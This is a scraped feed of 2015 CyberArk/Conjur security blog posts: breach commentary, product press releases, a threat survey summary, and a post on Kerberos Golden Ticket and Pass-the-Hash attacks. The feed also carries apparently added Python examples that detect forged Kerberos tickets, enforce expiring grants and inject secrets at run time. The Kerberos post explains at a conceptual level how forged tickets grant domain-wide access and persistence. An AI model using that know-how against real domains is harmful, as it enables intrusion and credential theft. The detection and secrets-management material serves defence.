Imagine that your company was approached by the FBI and told that criminals had taken your clients’ information and have had it at their disposal for the past two years. Well, that’s the real-life nightmare Scottrade is faced with. The most troubling aspect of the Scottrade breach is that it went unnoticed for two years. This forces us to wonder, how much of our data has been compromised that we don’t even know about… what if our information is being taken right now? Without a second thought we buy insurance, apply for loans, sign up for cell phone plans, and make online purchases. And without a second thought, businesses take this information and store it, gambling with our personal details and hoping that their databases are secure enough to resist a breach, without taking any real, meaningful steps to ensure this is the case. With PR nightmares like this one, I have to wonder, why aren’t companies keeping a closer eye on their secrets?

Although the breach occurred two years ago, it was only recently that Scottrade uncovered the hack in their system. The FBI alerted Scottrade to the breach that exposed the personal information of over 4.6 million customers. Although Scottrade maintains that only the names and addresses of customers were taken, it is highly likely that other information was compromised as well. The systems containing the contact information also stored social security numbers, according to Threatpost. Marketwatch cautions customers that brokerage numbers are also on the list of potentially compromised data.

This information further validates the assumption that more than just names and addresses were exposed, despite Scottrade’s insistence that contact information was the hackers’ main focus. When questioned as to how Scottrade came to this conclusion, Scottrade could not answer, stating that it could jeopardize the investigation. It may never be revealed what information was actually taken from Scottrade, as most companies don’t keep data that old in their systems. Customers are angry, including one Scottrade customer who has decided to sue the company in a class-action lawsuit. The suit requests that Scottrade not only pay for at least 3 years of credit and identity monitoring for compromised customers, but also repay any monetary, statutory, and punitive damages.

It is common for enterprises to cut costs wherever possible; however, security is not the place to skimp on resources. These breaches are a lot more expensive than the costs associated with properly securing infrastructures in the first place. According to research by the Ponemon Institute, data breaches cost companies approximately $3.8 million (an increase from last year’s cost of $3.5 million). For businesses, breaches affect more than just their wallet; they also taint the reputations they have worked so hard to create. Every single week consumers are faced with a new company they can no longer trust and are ridden with heightened paranoia every time they give out a social security number or use a credit card. The problem now is that not only are these breaches happening, but they are taking far too long to be detected. People are only aware of the fraud once it is too late, and this fraudulent activity is difficult to remedy.

If Scottrade had a clear and easily accessible audit log, it wouldn’t have taken so long to notice suspicious behavior in their systems. High-velocity organizations that practice continuous delivery rely on many dynamic tools, users, and machines. All of these complexities make it difficult to scale security in the name of velocity. Companies need secrets management solutions that are scalable with both machine authentication and granular access control. With the correct security measures in place to manage secrets, hackers would have been denied access to the system in the first place.

For more information on proper secrets management, download our secrets management checklist.

Worried about your cybersecurity this October? Remember, the best defense is an even better offense.

]]>
Cutting-Edge Reports User Interface among Improvements in New Conjur Release https://www.cyberark.com/blog/cutting-edge-reports-user-interface-among-improvements-in-new-conjur-release/ Wed, 14 Oct 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/cutting-edge-reports-user-interface-among-improvements-in-new-conjur-release/  

Conjur 4.5 Provides Greater Transparency, Compliance Reporting for High Velocity IT Infrastructures; Reports UI Crucial Tool for Understanding, Reporting on Permissions that Govern IT Infrastructure

WALTHAM, Mass., Oct. 14, 2015 - Conjur, Inc., provider of security orchestration software, released a new software version that improves enterprises’ ability to report on infrastructure assets such as secrets, Web services, users, groups, jobs, containers and machines. Conjur’s platform extends identity and role-based access management beyond people and into infrastructure and software platforms.

“Conjur 4.5 furthers our enterprise core technology while enabling a wider audience to realize immediate benefit from securing infrastructure with Conjur,” said Mitch Haile, Vice President of Products at Conjur. “With this release, security and compliance leaders now have dashboards and reports for compliance audits that enable greater transparency into their ever-changing IT environment.”


Traditionally, operations and security personnel have struggled to create comprehensive policies and reports that fully enumerate the users and software that have access to all of the moving parts of a continuous delivery environment. As projects, people and architectures change, it becomes very difficult to know who has access to what and when. Conjur solves this problem with an operational API and clear dashboard that highlights the latest activity and enables organizations to easily integrate with tools such as Docker, Puppet and Jenkins.

Additional improvements in Conjur 4.5 include:

  • Dynamic Traffic Authorization: This feature allows policy-based authorization and audit of HTTP(S) traffic. It secures REST APIs, Docker containers and microservices without code modification.
  • Active Directory + LDAP Synchronization: The new release supports synchronization with Active Directory and other LDAP directory services so that Conjur policies can be applied to resources mastered in those directories. In addition, Conjur users can authenticate to Conjur using their AD or LDAP password.
  • Global Permissions – Elevate and Reveal: These permissions grant certain roles the ability to bypass permission checks, either to modify the permissions model or to view it without sacrificing audit capabilities.
  • Ships as a Docker Image: Conjur 4.5 now ships as a Docker image so that modern IT infrastructures can deploy and manage Conjur HA using container orchestration technology.
  • High Availability Enhancements: The new operational and management features make configuring and operating replicated Conjur installations easier than ever before, while still retaining the robust features that have powered Conjur installations around the globe.

Conjur 4.5 is available immediately at: https://info.conjur.net/demo.

Conjur 4.5 Technical Release Notes: https://developer.conjur.net/release-notes

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.


]]>
Kerberos Attacks: What You Need to Know https://www.cyberark.com/blog/kerberos-attacks-what-you-need-to-know/ Fri, 09 Oct 2015 14:38:41 +0000 https://www.cyberark.com/blog//

Privileged account exploitation is at the center of targeted cyber attacks, and post-mortems of today’s most high-profile breaches – from Sony Pictures to Office of Personnel Management (OPM) – reveal an increasingly predictable pattern.  Attackers crash through the network perimeter, hijack credentials and use them to move laterally throughout the network, taking additional credentials and escalating privileges along the way to accomplish their goals.

Combining privileged accounts with attacks on the Kerberos authentication in Windows domains raises the stakes of the cyber threat. During such attacks, threat actors target domain administrator privileges, which provide unrestricted access and control of the IT landscape. Armed with these privileges, attackers can stealthily manipulate Domain Controllers (and Active Directory) and generate Kerberos tickets to obtain unauthorized access.

Identified as one of the most dangerous attack techniques at this year’s RSA Conference, Kerberos attacks are troublesome for three primary reasons:

  • Access: Once an attacker has Local Admin privileges, it is possible to dump additional credentials, which if left behind in the compromised machines, enable the attacker to move laterally in the network, elevate privileges and gain unauthorized access to valuable assets.
  • Obscurity: To bypass security controls and evade detection, an attacker can reuse Kerberos tickets to impersonate authorized users and sidestep authentication processes – disguising activity and avoiding authentication log traces.
  • Persistence: The days of stolen data being dumped all at once are largely over – attackers often prefer to remain on the network undiscovered for extended periods of time, funneling information out little by little. Kerberos attacks give attackers what they need most to do this: time. It is possible to maintain persistence with Kerberos tickets, even when credentials have been changed.

While there are several types of attacks on authentication protocols – including Pass-the-Hash, Overpass-the-Hash and Pass-the-Ticket – the most destructive of all is the Golden Ticket. This technique can mean “game over” for an organization and complete loss of trust in the IT infrastructure.

InfoWorld’s Robert Grimes well described this devastating attack in his article, Fear the Golden Ticket Attack, when he wrote, “If you have domain admin/local admin access on an Active Directory forest/domain, you can manipulate Kerberos tickets to get unauthorized access. A golden ticket attack is one in which you create a Kerberos-generating ticket that is good for 10 years or however long you choose. You can be anyone (assuming you have their hash), add any account to any group (including highly privileged groups), and for that matter, do anything you want within Kerberos authentication capabilities. You can even create usable Kerberos tickets for user/computer/service accounts that don’t even exist in Active Directory. A golden ticket isn’t merely a forged Kerberos ticket – it’s a forged Kerberos key distribution center.”

Executing this level of attack requires domain administrator credentials, putting these credentials directly in the crosshairs of any advanced attacker or malicious insider. To maintain control of your IT infrastructure, it is absolutely critical to prevent attackers from ever compromising a domain administrator credential.

CyberArk’s latest Global Advanced Threat Landscape Survey revealed that far too many organizations remain focused on defending against perimeter attacks, including phishing, while discounting attacks launched from deep inside an organization, such as Kerberos attacks, that can be the most devastating. To help organizations fully understand the severity of Kerberos attacks and take actionable steps to reduce risk, we’ve developed a white paper – Maintain Control of Your Business: Protect Your Domain Controller from Kerberos Attacks – which is available for download. Learn about:

  • Several increasingly prevalent Kerberos attack methods, which can enable control over a target’s network by commandeering the domain controller;
  • Key strategies for reducing risk and blocking an attacker’s progress at two critical phases of the attack lifecycle: credential theft and lateral movement;
  • The integral role of analytics and machine learning for early detection of anomalous activity and rapid response to in-progress attacks.

We encourage you to download this free resource today. And be sure to tune in regularly as we delve further into the little-understood world of Kerberos attacks.
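The post notes that forged tickets can name accounts that do not exist in Active Directory and that they sidestep the normal authentication path. A defender can use both facts: a forged TGT is never issued by the KDC, so no TGT request is ever logged for it, yet the service tickets obtained with it are. The following correlation over Windows Security events 4768 (TGT requested) and 4769 (service ticket requested) is an added example written for this page, not code from CyberArk or from the white paper; the event records, the account directory and the client addresses are constructed, and the event IDs are the real Windows ones.

```python
"""Added example: flag Kerberos service-ticket use with no matching TGT issuance
or naming an account unknown to the directory. Sample events are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class KerbEvent:
    event_id: int    # 4768 = TGT requested, 4769 = service ticket requested
    account: str     # Account Name field as written in the event
    client_ip: str   # Client Address field
    ts: int          # seconds since epoch (constructed)


# Stand-in for an Active Directory account lookup (constructed).
KNOWN_ACCOUNTS = {"alice", "bob", "svc-backup", "krbtgt"}

# Constructed sample events from all domain controllers, merged into one stream.
SAMPLE_EVENTS = [
    KerbEvent(4768, "alice", "10.0.0.5", 1000),        # TGT issued to alice
    KerbEvent(4769, "alice", "10.0.0.5", 1005),        # normal: TGT seen, account known
    KerbEvent(4769, "bob", "10.0.0.9", 2000),          # no TGT ever issued to this client
    KerbEvent(4769, "ghost-admin", "10.0.0.77", 3000), # account does not exist in AD
]

# Default domain TGT lifetime is 10 hours; a TGT older than that without a
# renewal (event 4770) should not still be producing service tickets.
TGT_MAX_AGE_SECONDS = 10 * 3600


def find_suspicious(events, known_accounts=KNOWN_ACCOUNTS,
                    tgt_max_age=TGT_MAX_AGE_SECONDS):
    """Return (account, client_ip, reason) tuples for service-ticket requests
    that the KDC's own logs cannot account for."""
    findings = []
    last_tgt = {}  # (account, client_ip) -> timestamp of the most recent 4768
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.account.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.ts
        elif ev.event_id == 4769:
            if ev.account.lower() not in known_accounts:
                findings.append((ev.account, ev.client_ip, "account not in directory"))
            issued = last_tgt.get(key)
            if issued is None or ev.ts - issued > tgt_max_age:
                findings.append((ev.account, ev.client_ip,
                                 "service ticket without recorded TGT"))
    return findings


if __name__ == "__main__":
    for account, ip, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{account} from {ip}: {reason}")
```

The correlation only works on a stream that merges the security logs of every domain controller, because the TGT and the service ticket can be issued by different DCs; renewals (event 4770) should reset the age the same way a 4768 does. It is a heuristic that narrows what an analyst looks at, not proof of forgery.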

]]>
The Big Shift: Static to Dynamic Security Models https://www.cyberark.com/blog/the-big-shift-static-to-dynamic-security-models/ Thu, 08 Oct 2015 15:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-big-shift-static-to-dynamic-security-models/  

With the advent of Cloud Computing, Mobile Endpoints, and IoT, Data Center Infrastructure and Security models have shifted from well-defined perimeters that were protected by firewall appliances, static policies, and monolithic stacks to dynamic, software-defined infrastructure powered by virtualization and containerization. The perimeter is now elastic and can’t be defined or secured by static policies.  Host and Endpoint Security has shifted to a distributed model that is driven by dynamic policies, ephemeral machine instances, and immutable infrastructure.

One major component of Infrastructure hasn’t kept pace with this transformation, and that is Identity, Access, and Secrets Management for Users, Services, and Machines. The traditional solutions of /etc/passwd, LDAP, and Active Directory lack flexible context for these new architectures, and as the 2015 breach reports show, a lack of rigor around Identity Credentials is the root cause of the majority of them. Another challenge for CIOs and Infrastructure leaders is the development and maintenance of “home grown” solutions that typically solve a tactical challenge but fall short strategically, then inevitably lose support over time and become “orphaned”. This approach usually creates more security challenges than it solves.

The two basic components of Identity Security are:

  • Authentication (AuthN) :: Are you who you say you are?

  • Authorization (AuthZ) :: Do you have the access rights to perform the requested action?

Cloud and Microservice architectures along with Cloud-Native applications require a new Identity and Security orchestration solution; one that is API-driven, dynamic, and adaptive. Ephemeral instances and services need a new approach to AuthN and AuthZ, where access rights have an expiration time, secrets such as API keys, tokens, and certificates are rotated at specific intervals, and, most importantly for security and compliance, a complete audit log is kept. Traditional ACLs are unable to provide the level of granularity for security, and even host-based approaches don’t translate to this new architecture due to challenges around eventual consistency. Services and Machines need to perform both AuthN and AuthZ operations in real-time, instead of having static rules applied to them.
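The requirements listed above (authenticate first, authorize against grants that expire, and record every decision in an audit log) can be shown in a few dozen lines. The following is an added example written for this page, not Conjur’s code or API; the identities, roles, API keys, resource names and timestamps are constructed. It also shows one way to make the audit log tamper-evident, by hash-chaining its entries, which is an assumption about how an “immutable” log might be checked rather than something the post specifies.

```python
"""Added example: AuthN, then time-bounded AuthZ, with an audit log whose
entries are hash-chained. All identities, keys and policy are constructed."""
import hashlib
import hmac
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Grant:
    role: str          # role that holds the privilege
    privilege: str     # e.g. "read" or "execute"
    resource: str      # e.g. "variable:prod/db/password"
    expires_at: float  # epoch seconds; the grant is void at or after this time


@dataclass
class IdentityService:
    api_keys: dict              # identity -> API key (constructed stand-in)
    roles: dict                 # identity -> set of role names
    grants: list                # list of Grant
    audit: list = field(default_factory=list)

    def authenticate(self, identity, api_key, now):
        """AuthN: are you who you say you are? Constant-time key comparison."""
        expected = self.api_keys.get(identity)
        ok = expected is not None and hmac.compare_digest(expected, api_key)
        self.audit.append((now, "authn", identity, ok))
        return ok

    def authorize(self, identity, privilege, resource, now):
        """AuthZ: does any unexpired grant for one of your roles cover this action?"""
        allowed = any(
            g.role in self.roles.get(identity, set())
            and g.privilege == privilege
            and g.resource == resource
            and now < g.expires_at
            for g in self.grants
        )
        self.audit.append((now, "authz", identity, privilege, resource, allowed))
        return allowed


def check_access(service, identity, api_key, privilege, resource, now):
    """Never evaluate authorization for a caller that failed authentication."""
    if not service.authenticate(identity, api_key, now):
        return False
    return service.authorize(identity, privilege, resource, now)


def audit_chain(entries):
    """Hash-chain the audit entries: altering or dropping any entry changes the
    final digest, so a stored digest lets a reviewer detect tampering."""
    digest = b"\x00" * 32
    for entry in entries:
        digest = hashlib.sha256(digest + repr(entry).encode()).digest()
    return digest.hex()


def demo():
    """Constructed scenario: a host reads a secret before and after its grant expires."""
    svc = IdentityService(
        api_keys={"host/web-01": "constructed-key-1"},
        roles={"host/web-01": {"web-tier"}},
        grants=[Grant("web-tier", "read", "variable:prod/db/password",
                      expires_at=1_700_000_600)],
    )
    res = "variable:prod/db/password"
    before = check_access(svc, "host/web-01", "constructed-key-1", "read", res, 1_700_000_000)
    after = check_access(svc, "host/web-01", "constructed-key-1", "read", res, 1_700_001_000)
    bad_key = check_access(svc, "host/web-01", "wrong-key", "read", res, 1_700_000_000)
    return before, after, bad_key, len(svc.audit)


if __name__ == "__main__":
    print(demo())
```

Rotation fits the same shape: replacing a value in `api_keys` invalidates the old key everywhere at once, and the audit log shows exactly which identities authenticated with which outcome around the rotation.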

Conjur’s Next-Gen Identity Security Platform is the only one on the market built with the new stack in mind. Identity Security has shifted from static policies on monolithic systems to dynamic policies that adapt to architectural changes and new ephemeral services.  User Authentication and Authorization is now powered by a RESTful API and Elastic Policies can be applied to Users, Machines, and API endpoints.

Because Authorization rules can be applied to both users and machines, your API endpoints can now have a much finer level of security granularity, instead of simply being Public or Private.  Policy Enforcement is decoupled from the underlying infrastructure and becomes proactive instead of reactive, and is also built upon Role Based Access Control (RBAC). Security is now woven into the fabric of applications instead of being a shield in front of them.

SSH Key management shifts from the distribution of public-keys to every host in your infrastructure (eventually consistent) to a centralized, secure host that applies both AuthN and AuthZ policies at login time. All activity is securely logged to an immutable audit log, which bolsters your overall security insight, as well as provides rich context for your SOX, PCI, and other compliance requirements.


Secrets such as passwords, API Keys, and SSL Certificates should never be stored in source-code files. Conjur’s Summon allows you to securely move secrets out of source code and inject them from a configurable secrets provider  into the process environment at run-time. 
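The pattern described here separates what is committed to the repository (a list of environment variable names and the secret paths they map to) from the secret values, which are fetched from a provider only when the process starts. The block below is an added example of that pattern written for this page, not Summon’s source or its command line; the manifest mirrors the shape of a Summon secrets.yml but is held inline, the provider is a constructed dictionary standing in for a real secrets store, and the secret values are constructed.

```python
"""Added example of run-time secret injection: references live in the repo,
values come from a provider at start-up and reach the child only via its
environment. Provider and values are constructed stand-ins."""
import os
import subprocess
import sys

PYTHON = sys.executable  # interpreter used for the child process in the demo

# What is committed: variable names and secret *paths*, never values.
# Constructed to mirror the shape of a secrets.yml; "!var" marks a reference.
SECRETS_MANIFEST = {
    "DB_PASSWORD": "!var prod/db/password",
    "API_TOKEN": "!var prod/api/token",
    "DB_HOST": "db.internal.example",  # a plain literal, not a secret
}

# Stand-in for a secrets provider (constructed values for the example only).
FAKE_PROVIDER = {
    "prod/db/password": "constructed-db-pass",
    "prod/api/token": "constructed-token",
}


def missing_references(manifest, provider):
    """Paths the manifest references that the provider cannot supply."""
    return [spec[len("!var "):] for spec in manifest.values()
            if spec.startswith("!var ") and spec[len("!var "):] not in provider]


def resolve(manifest, provider):
    """Turn the manifest into an environment mapping, fetching each reference.
    Fails closed: a single unresolvable reference aborts the whole start-up."""
    missing = missing_references(manifest, provider)
    if missing:
        raise KeyError(f"secrets not available from provider: {missing}")
    env = {}
    for name, spec in manifest.items():
        env[name] = provider[spec[len("!var "):]] if spec.startswith("!var ") else spec
    return env


def run_with_secrets(manifest, provider, argv):
    """Run argv with resolved secrets added to a copy of the environment.
    Nothing is written to disk, and the child never talks to the provider."""
    env = os.environ.copy()
    env.update(resolve(manifest, provider))
    return subprocess.run(argv, env=env, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # The child only reports the length of the injected value, to avoid
    # printing a secret to a terminal or build log.
    print(run_with_secrets(SECRETS_MANIFEST, FAKE_PROVIDER,
          [PYTHON, "-c", "import os; print(len(os.environ['DB_PASSWORD']))"]))
```

Because the values exist only in the child’s environment, they are absent from source control, container images and build artifacts; the remaining exposure is anything that dumps the environment (crash reports, debug endpoints), which the application still has to guard against.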


Policy configuration and management moves out of disparate configuration files into a single-pane-of-glass UI that allows complete visibility into the Infrastructure, complete with detailed reports for insight, audit, and compliance.


]]>
Conjur’s CEO Speaks on Security Panel at Velocity New York https://www.cyberark.com/blog/conjurs-ceo-speaks-on-security-panel-at-velocity-new-york/ Wed, 07 Oct 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjurs-ceo-speaks-on-security-panel-at-velocity-new-york/  

Conjur’s CEO, Elizabeth Lawler, Speaks on “Finance, Security, and Modern IT Infrastructure” Panel at Velocity New York – October 12-14, 2015 – New York, New York

Press Release:

WALTHAM, Mass. – Oct. 7, 2015 – Elizabeth Lawler, CEO at Conjur, Inc., provider of security orchestration software, is speaking on the panel, “Finance, Security, and Modern IT Infrastructure,” at Velocity New York, taking place on Monday, October 12 – Wednesday, October 14, 2015 in New York, New York. Most companies with outward-facing dynamic websites face the same challenges: pages must load quickly, infrastructure must scale efficiently, and sites and services must be reliable, without burning out the team or breaking the budget. Velocity is the best place for Web ops and performance professionals to learn from peers, exchange ideas with experts and share best practices.


WHAT:  Conjur’s CEO Elizabeth Lawler Speaking on Panel, “Finance, Security, and Modern IT Infrastructure,” at Velocity New York

WHEN:  Monday, October 12, 2015, 3:30 p.m. – 4:05 p.m. EDT

WHERE: New York Hilton Midtown, 1335 Avenue of the Americas, New York, New York – Rhinelander South

For Web-first companies, the old infosec models of simply locking everything down have fallen by the wayside in favor of new approaches that allow businesses to move quickly and improve their security practices simultaneously. Where standard security measures and compliance and audit practices used to impede progress, from product design through development and deployment, they are now folded into agile processes, DevOps approaches and tooling, and continuous delivery pipelines. This might all seem like fantasy and vaporware for financial organizations, but it is happening there, too, albeit at a slower pace. This panel brings together security start-ups and veterans to discuss the challenges and opportunities facing financial organizations in this new landscape. Elizabeth Lawler is joined by panelists Courtney W. Nash, Director, Strategic Content at O’Reilly; Jamesha Fisher, DevOps Security Pirate at CloudPassage, Inc. and Zane Lackey, Founder and CSO at Signal Sciences.

Elizabeth Lawler is CEO and co-founder of Conjur, Inc. She has over 20 years of experience working in highly regulated and sensitive data environments. Elizabeth speaks often on how speed, scale, security and compliance can be achieved through organizational, methodological and technological change. Prior to founding Conjur, Elizabeth was chief data officer of Generation Health and held a leadership position in research at the Department of Veterans Affairs. She is a programmer herself and is constantly working to make development and IT systems easier to manage for people working in regulated industries. She holds a doctorate degree and a master’s degree in biostatistics and epidemiology from Boston University.

For more information on Velocity New York, visit: http://velocityconf.com/devops-web-performance-ny-2015.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

Contact:
Tracy Wemett
BroadPR
+1-617-868-5031


]]>
Conjur Presents on Using Puppet with a Secret Server at PuppetConf 2015 https://www.cyberark.com/blog/conjur-presents-on-using-puppet-with-a-secret-server-at-puppetconf-2015/ Mon, 05 Oct 2015 13:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-presents-on-using-puppet-with-a-secret-server-at-puppetconf-2015/  

Conjur’s Josh Bregman Talks about Speeding the Path to Security and Compliance with Secrets Servers at PuppetConf – October 5-9, 2015 – Portland, Oregon

WALTHAM, Mass. – Oct. 5, 2015 – Josh Bregman, Vice President at Conjur, Inc., provider of security orchestration software, is presenting, “Using Puppet with a Secret Server,” at PuppetConf 2015, taking place on Monday, October 5 – Friday, October 9, 2015 in Portland, Oregon. Sessions at PuppetConf range from how to get started with Puppet, modules and related technologies, to advanced tips and tricks for using Puppet, PuppetDB, Razor, Facter and more. Software by Puppet Labs, the leading provider of IT automation software, provides system administrators the operational agility, efficiency and insight they need to proactively manage dynamic infrastructure, scaling from tens of servers to thousands, both on premise and in the cloud.


WHAT:  “Using Puppet with a Secret Server,” Presented by Conjur’s Josh Bregman at PuppetConf 2015

WHEN:  Thursday, October 8, 2015, 4:45 p.m. – 5:30 p.m. PDT

WHERE: Oregon Convention Center, 777 NE Martin Luther King Jr Blvd, Portland, Oregon – Oregon Ballroom 202

The year 2015 is shaping up as the “year of the secrets server,” with numerous open source and commercial options now available. Secrets servers offer important advantages compared to storing secrets in configuration management. From a security standpoint, secrets servers speed the path to security and compliance certification, offering capabilities such as end-to-end encryption, access control, detailed auditing of access, purpose-built APIs, dedicated management and reporting tools, and support for auto-scaling deployment architectures. Furthermore, using a secrets server enables DevOps teams to roll back the “lockdown” and re-establish the collaborative workflows that configuration management was developed to encourage.

Josh Bregman has 20 years of experience successfully architecting, evangelizing and delivering innovative identity management and security products to customers. Prior to joining Conjur, Josh spent a decade as a solutions and pre-sales leader in the Oracle ecosystem. A developer at heart, early in his career Josh worked as a software engineer at IBM, GTE Labs and Netegrity. He has two U.S. patents and received a bachelor’s degree in math from the University of Rochester. Follow Josh on Twitter @kingoauth.

Conjur is a Silver Sponsor of PuppetConf 2015. For more information, visit: https://2015.puppetconf.com.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

Contact:

Tracy Wemett
BroadPR
+1-617-868-5031

All trademarks recognized.


]]>
Hackers…Checking In https://www.cyberark.com/blog/hackers-checking-in/ Wed, 30 Sep 2015 20:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/hackers-checking-in/  

The names Trump and Hilton have graced headlines this week… and not for the reasons you may suspect. No, there was no celebrity feud or off-color remark. Both the Hilton Hotel and Trump Hotel Collection have suffered cybersecurity breaches, forcing recent travelers to comb through credit card statements looking for suspicious activity, further augmenting their post-vacation blues.

We’ve heard these data breach stories time and time again, and yet it seems that we, the actual victims, are the only ones paying attention. It forces the question: do companies simply not understand how important data security is? This lack of attention to keeping information secure puts us, the buyers, in a very difficult position. Normally, if you have a bad experience at one business you can take your business elsewhere, giving a competitor the chance to wow you. However, what do we do in this scenario? We can’t just try out a new hotel or retail chain, because the competitor has most likely had, or is at risk of having, a breach as well if its data isn’t properly secured.

Here’s the latest information on the Hilton Hotel and Trump Hotel Collection security hacks:

This piece on Softpedia says the breach affects guests who stayed at Trump SoHo New York, Trump National Doral and the Trump International locations in New York, Chicago,  Waikiki, Las Vegas, and Toronto between May 19, 2014 and June 2, 2015. It confirms that credit card information like the number, expiration date, and security code were exposed as well as first and last name for guests at select hotel locations.

This piece from The Street discusses both the Hilton and Trump breaches. It cautions that although these two were publicized, many other hotels are likely being hacked by cybercriminals, since the attacks go undetected and the businesses don’t even realize they are happening. Because hotels are typical destinations for people with money, they are a desirable target, with attackers constantly scanning their systems for vulnerabilities.

In this article from CSO Online, Dave Lewis writes that enterprises need to do a better job of strengthening their defenses against cybercriminals. He also points out that although Trump Hotels is providing a year of fraud resolution services to guests residing in the U.S. (something mandated by law), international guests are excluded.

According to this piece, the Hilton breach may have occurred as early as last November. POS devices in the chain’s restaurants, coffee bars and gift shops were potentially affected, putting more than just hotel guests at risk.

This report reveals that Hilton properties such as Embassy Suites, Doubletree, Hampton Inn and Suites, and the Waldorf Astoria Hotels & Resorts are potentially affected by the breach. The article outlines three things you should do if you think your information was compromised.

Looks like it’s time to pull out that tattered sleeping bag and tent and vacation the good, old-fashioned way, sans credit cards…and 5 star amenities.


]]>
Introducing the CyberArk 2015 Global Advanced Threat Landscape Survey https://www.cyberark.com/blog/introducing-the-cyberark-2015-global-advanced-threat-landscape-survey/ Wed, 30 Sep 2015 10:24:55 +0000 https://www.cyberark.com/blog//

Today we unveiled the findings from our 2015 Global Advanced Threat Landscape Survey. Now in its ninth year, this report pinpoints cyber security trends and emerging risks based upon a compilation of interviews with 673 IT security and C-level executives from organizations around the globe.

The primary takeaway is clear: Cyber attacks that exploit privileged and administrative accounts – the credentials used to manage and run an organization’s IT infrastructure – represent the greatest enterprise security risks today.

While we encourage you to read the full, free report, here’s our take on some of the key findings:

More than a Data Breach – Complete Network Takeover
The majority of respondents (61 percent) cited privileged account takeover as the most difficult stage of a cyber attack to mitigate, up from 44 percent in last year’s study. Awareness of this security risk has increased and for good reason. High profile attacks on Sony Pictures, the U.S. Office of Personnel Management (OPM) and others illustrate how, with privileged credentials in-hand, attackers can exfiltrate sensitive data or conduct a hostile takeover of network infrastructure. This new reality highlights the threat of privileged account hijacking within the enterprise, yet many organizations still struggle to identify and locate privileged accounts across their networks. If they can’t find them, how can they protect them?

Corporate Confidence and a False Sense of Data Security
Despite mounting evidence to the contrary, 44 percent of respondents continue to believe they can keep motivated attackers off the network or reasonably discover them once they’ve infiltrated an organization. This confidence is misplaced. Today, it is no longer acceptable for organizations’ security programs to presume they can keep attackers off their network. They must adopt the mindset that the attacker has already made it inside.

Organizations Fail to Recognize Emerging Threats Inside the Network
When asked to rank the type of attacks they were most concerned about, many respondents pointed to perimeter attacks, such as phishing (70 percent), as their primary concern. There was less awareness about potentially devastating compromises that happen within the network, such as Pass-the-Hash and Kerberos attacks, including Golden Ticket that can enable complete control over a target’s network by taking over the domain controller. It’s time for business and IT leaders to turn their focus to what can be done to stop attackers once they are inside the network and recognize that phishing and other unsophisticated means of attack will happen, and they will be successful.

Today’s most damaging attacks occur when attackers steal privileged and administrative credentials and gain the same level of access as the internal people managing the systems. This puts an organization at the mercy of an attacker’s motivation, be it financial, espionage or causing harm to the business. With ongoing education and increasing awareness about the devastating fallout of privileged account takeover, there is an accelerated shift in the industry’s security mentality.

To learn more, download the 2015 Global Advanced Threat Landscape Survey at https://www.cyberark.com/ThreatSurvey2015.

]]>
Conjur CEO Elizabeth Lawler Speaking on Panel at MassTLC Security Conference https://www.cyberark.com/blog/conjur-ceo-elizabeth-lawler-speaking-on-panel-at-masstlc-security-conference/ Tue, 29 Sep 2015 21:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-ceo-elizabeth-lawler-speaking-on-panel-at-masstlc-security-conference/

Our CEO, Elizabeth Lawler, will be speaking at the MassTLC Security Conference at the Federal Reserve Bank in Boston tomorrow (9/30). The event “The Business of Security: Impacting Your Company’s Resiliency, Reputation and Revenue,” will focus on the increasing impact of security on businesses.

Elizabeth will be participating in a panel discussion tomorrow (9/30) from 1:45 – 2:25pm. The Session “Coming Soon! The Next Security Mecca-Boston!,” will focus on how we can grow and learn through investment, mentoring, education, and buying local to ensure the strength of not only our individual business but also the entire Boston security sector.

Earlier this week, Elizabeth sat down with Clare Madden to discuss why Enterprises in the Boston area need to do more to become design partners with security startups.

Why is stepping up security, immediately, particularly important to your company/industry?

My industry is cyber security, so this is a bit of a skewed reply. However, what we are observing from the breaches of the last 4 years is that there were two classes of companies: 1) high velocity IT innovators and new technology adopters who were breached (LinkedIn, Facebook, Uber, etc) who were required to cobble together cyber security solutions to address technology gaps in their infrastructure, and 2) companies who cannot innovate in the IT space owing to cyber security concerns/constraints.

So stepping up security has a positive impact to the business directly (faster IT innovation, faster time to value) for both cohorts of companies.

What is the key obstacle companies like yours face in bringing security up to where it needs to be?

Lack of tooling in next generation infrastructure, difficulty hiring, organizational alignment around methodologies and technologies, rather than technology alone as a remediation.

What is the next step that you recommend the local community takes to ensure that Boston becomes the next security Mecca?

